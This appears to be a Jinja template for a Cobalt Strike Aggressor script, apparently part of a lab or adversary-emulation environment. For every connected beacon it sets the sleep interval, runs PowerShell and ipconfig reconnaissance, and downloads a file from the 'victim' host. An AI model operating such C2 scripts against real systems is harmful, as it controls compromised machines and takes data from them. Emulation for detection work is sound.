{%- set heartbeat_min = attacker.cobaltstrike.listener.heartbeat.interval.min %}
{%- set heartbeat_max = attacker.cobaltstrike.listener.heartbeat.interval.max %}
on ready {
  println("[Ready]" . formatDate("yyyy.MM.dd HH:mm:ss z") . " Existing listeners: " . listeners() . "\n");
  println("[Ready]" . formatDate("yyyy.MM.dd HH:mm:ss z") . " Existing beacons: " . beacons() . "\n");
  foreach $vic (beacons()) {
    $victim = $vic['id'];
    println('Target beacon ID: ' . $victim);
    blog($victim, 'Start C2 scripts ...');
    bsleep($victim, {{ range(heartbeat_min, heartbeat_max) | random }});
    bpowershell($victim, '$PSVersionTable');
    bshell($victim, 'ipconfig');
    bdownload($victim, 'C:\\vagrant\\{{ dependencies.cs_installer }}');
  }
}
